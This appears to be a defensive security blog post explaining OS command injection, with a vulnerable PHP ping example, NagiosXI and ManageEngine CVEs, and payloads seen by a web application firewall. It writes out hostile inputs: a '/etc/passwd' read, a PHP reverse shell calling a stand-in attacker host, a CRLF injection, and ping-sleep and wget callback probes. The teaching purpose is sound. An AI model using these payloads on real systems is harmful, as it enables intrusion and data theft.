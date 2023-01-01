What is OS command injection?

OS command injection is a web application vulnerability that allows attackers to execute arbitrary commands on the underlying operating system. These vulnerabilities occur when web applications call operating system commands with user-supplied input provided as arguments. The vulnerability may also be identified with either CWE-77 or CWE-78 .

Consider a web application meant to monitor internal systems and provide alerts when one of the systems goes offline. In this scenario, the application may want to test network reachability to the target and does so by executing a ping command. If the application is written in PHP, the underlying code may look something like the following:

$ip_address = $_GET["ip_address"]) $not_used = array(); $return_code = 0; exec('ping -W 2 -c 1 ' . $ip_address, $not_used, $return_code)

In this example, PHP’s exec function executes the ping command with the user-provided value for ‘ip_address’ appended at the end as the target to test its reachability. If, however, an attacker instead provides localhost; cat /etc/passwd as the provided IP address, both the ping command and the second command initiated after the semicolon will execute. If successful, the attacker will then have full command execution and can execute any number of malicious commands to attempt to escalate access, retrieve sensitive information, maintain persistence, or pivot to other targets on the network. Due to its often more devastating impact, command injection vulnerabilities are typically rated more severely than other web application vulnerabilities.

What is not OS command injection?

Command injection is often confused with other injection attacks, most notably code injection . The simplest way to distinguish between the two vulnerabilities is the method and context of the payload execution:

Command injection notably executes in the context of the underlying operating system’s shell programs (e.g., bash, PowerShell) by injecting into the call to an outside program.

Code injection executes in the context of the programming language in use. An example of this would be injecting into PHP’s include or eval functions and being able to execute arbitrary PHP code.

Where folks sometimes get confused is when a command injection payload contains code from programming languages like PHP. For example, consider using the following command injection payload in our previous example that will launch a reverse shell:

localhost; php -r '$sock=fsockopen("attackers.ip.example.com",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Since the payload contains mostly PHP code, at first glance it may come off as Code Injection. However, the beginning of the payload is what demonstrates that it is actually command injection. In this example, the semicolon ends the ping command before the PHP command is executed. php -r then executes the following PHP on the command line, which in this case is a reverse shell back to the attacker’s IP address. While PHP code is being executed in our payload, this is OS command injection because we’re injecting into the OS’ shell program arguments.

Real examples of OS command injection

With an understanding of what is and isn’t OS command injection, let’s take a look at some real examples of this attack and how they were executed.

OS command injection in NagiosXI: CVE-2021-25296(7,8)

NagiosXI versions 5.5.6 to 5.7.5 were affected by three separate instances of command injection. Our earlier ping example is actually loosely taken from CVE-2021-25298, whose command injection vulnerability resided in a call to ping through PHP’s exec function with a user-supplied IP address. In our detailed analysis of these CVEs, we demonstrate using these vulnerabilities in a practical way by launching both Meterpreter remote shells and callbacks to Project Discovery’s interactsh . As noted by CISA as of this writing, these CVEs are actively exploited by attackers in the wild, demonstrating their potential value in compromising systems.

OS command injection in ManageEngine ADManagerPlus: CVE-2023-29084

This particular command injection vulnerability perfectly demonstrates how not to prevent command injection. Dinh Hoang has a wonderful write-up describing the vulnerability, specifically how ADManagerPlus uses a function CommonUtil.getPowerShellEscapedValue to escape a username and password value provided by the user for a reg add command. However, that function does not escape CRLF characters, which allows the following payload to be inserted as a password and launch calc: [any-content]\r

calc.exe . As we’ll discuss later, performing this type of input sanitization allows for mistakes, new bypasses, or missed metacharacters that can lead to future command injection.

OS command injection as seen by WAFs

Fastly’s Next-Gen WAF protects against command injection attacks. By investigating some observed command injection payloads, we can see what attackers are sending to detect OS command injection vulnerabilities.

Payload example 1: ping “sleep” in POST request data

language=&ping -c 25 127.0.0.1 &

This payload is a straightforward attempt at command injection into the language field. It also uses a blind command injection technique as it does not rely on retrieving output from the command to detect the injection. First, the payload uses the & metacharacter to execute the second command while the first command runs in the background. The payload contains the ping command with the -c flag, which tells ping to send 25 packets - one every second. By analyzing the response time, an attacker can determine whether their injected command was executed. This technique can fail, however, if the targeted application does not wait for the executed command to complete before sending an HTTP response, thus limiting its efficacy. Let’s look at a more interesting example of blind command injection that does not have this limitation.

Payload example 2: Wget in POST request data

macAddress=112233445566;wget http://[redacted-subdomain].oast.site#

This payload utilizes out of band network interaction, a blind command injection technique that relies on detecting an outbound network request from the injected command to detect command injection. Let’s break down the payload into its two parts: the escape and setup of the command, and the injected command’s contents.